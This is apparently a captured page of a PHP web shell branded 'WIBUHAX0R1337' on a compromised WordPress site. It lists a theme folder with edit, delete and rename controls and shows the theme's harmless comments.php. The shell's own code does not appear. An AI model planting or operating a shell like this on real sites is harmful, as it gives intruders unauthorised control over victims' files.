-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
logistic-transport
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
css
--
NONE
images
--
NONE
inc
--
NONE
js
--
NONE
languages
--
NONE
page-template
--
NONE
template-parts
--
NONE
webfonts
--
NONE
woocommerce
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
404.php
1.453KB
Edit File
Delete File
Rename
archive.php
15.795KB
Edit File
Delete File
Rename
comments.php
2.104KB
Edit File
Delete File
Rename
footer.php
4.458KB
Edit File
Delete File
Rename
functions.php
23.596KB
Edit File
Delete File
Rename
header.php
11.134KB
Edit File
Delete File
Rename
image.php
16.37KB
Edit File
Delete File
Rename
index.php
13.99KB
Edit File
Delete File
Rename
license.txt
34.323KB
Edit File
Delete File
Rename
no-results.php
1.378KB
Edit File
Delete File
Rename
page.php
1.444KB
Edit File
Delete File
Rename
rtl.css
35.197KB
Edit File
Delete File
Rename
search.php
15.633KB
Edit File
Delete File
Rename
searchform.php
0.681KB
Edit File
Delete File
Rename
sidebar.php
0.882KB
Edit File
Delete File
Rename
single.php
3.345KB
Edit File
Delete File
Rename
style.css
37.84KB
Edit File
Delete File
Rename
tc-style.php
31.146KB
Edit File
Delete File
Rename
<?php /** * The template for displaying Comments. * * @package Logistic Transport */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) return; ?> <div id="comments" class="comments-area mt-4"> <?php if ( have_comments() ) : ?> <h2 class="comments-title py-3"> <?php $comments_number = get_comments_number(); if ( '1' === $comments_number ) { /* translators: %s: post title */ printf( esc_html__( 'One thought on “%s”', 'logistic-transport' ), esc_html(get_the_title()) ); } else { printf( esc_html( /* translators: 1: number of comments, 2: post title */ _nx( '%1$s thought on “%2$s”', '%1$s thoughts on “%2$s”', $comments_number, 'comments title', 'logistic-transport' ) ), esc_html (number_format_i18n( $comments_number ) ), esc_html(get_the_title()) ); } ?> </h2> <?php the_comments_navigation(); ?> <ol class="comment-list"> <?php wp_list_comments( array( 'style' => 'ol', 'short_ping' => true, 'avatar_size' => 42, ) ); ?> </ol> <?php the_comments_navigation(); ?> <?php endif; // Check for have_comments(). ?> <?php // If comments are closed and there are comments, let's leave a little note, shall we? if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'logistic-transport' ); ?></p> <?php endif; ?> <?php comment_form( array( 'title_reply_before' => '<h2 id="reply-title" class="comment-reply-title">', 'title_reply_after' => '</h2>', 'title_reply' => esc_html(get_theme_mod('logistic_transport_comment_title',__('Leave a Reply','logistic-transport' )) ), 'label_submit' => esc_html(get_theme_mod('logistic_transport_comment_submit_text',__('Post Comment','logistic-transport' )) ), ) ); ?> </div>
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat